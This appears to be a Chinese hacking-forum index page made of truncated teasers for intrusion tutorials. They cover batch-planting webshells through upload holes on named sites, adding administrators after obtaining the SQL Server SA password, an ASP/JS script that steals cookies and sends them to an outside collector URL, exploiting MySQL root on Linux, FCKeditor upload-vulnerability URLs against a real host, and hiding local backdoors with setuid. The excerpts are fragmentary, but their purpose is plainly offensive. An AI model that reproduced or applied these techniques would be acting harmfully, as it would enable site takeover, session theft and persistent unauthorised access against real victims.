网络安全
-
教你拿站和找关键词思路(图)
目标这个站 http://www.chinaweibo.cc/upfile_Other.asp这个漏洞我刚看了看成功率10%左右吧我觉得这个数字就不低了 毕竟是批量拿webshell~~~关于上传漏洞的帖子和教程论坛有好多相信大家都会了 我步骤省略点第1 拿挖掘鸡挖或在谷歌上搜索 http://www....
-
Microsoft SQL Server SA权限最新入侵方法
在获得SA密码后,往往因为服务器管理者或”前人”将net.exe和net1.exe被限制使用,无法添加管理员账号。我们知道VBS在活动目录(ADSI)部分有一个winnt对象,用来管理本地资源,利用它可以不依靠CMD等命令就能添加一个管理员,具体代码如下:set wsnetwork=Cre...
-
asp+js 偷取Cookies源代码
偷取Cookie,通过以下脚本引入一个js,document.write("<script src=XX.js></script>"),然后js内容为: var code; var target = "http://www.xxx.net/cookie.asp?"; info=escape(document.location+"@@@"+d...
-
linux下mysql 5.x得到root密码后的另外一种利用方式
Author: Sh@dow 刚才在卫生间蹲着的时候忽然想到这个问题,mysql5.x for linux下面有一个函数,可以帮助我们干很多事情,这个函数4。x下面貌似没,原来一直没发现,也没去查函数手册,就我自己的经验来写点东西。4,x的明天再看看函数手册,再装一个实验一下。mysql 5.x里面...
-
FCKeditor JSP版漏洞
FCKeditor的JSP版漏洞 http://www.iwyv.com/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=Image&CurrentFolder=%2F http://www.iwyv.com/fckeditor/editor/filemanager/browser/default/connectors/jsp/conne...
-
linux下留本地后门的两个方法
方法一:setuid的方法,其实8是很隐蔽。看看过程:[root@localdomain lib]# ls -l |grep ld-linuxlrwxrwxrwx 1 root root 9 2008-06-07 17:32 ld-linux.so.2 -> ld-2.7.solrwxrwxrwx 1 root root 13 2008-06-07 17:47 ld-lsb.so.3 -> ld-linu...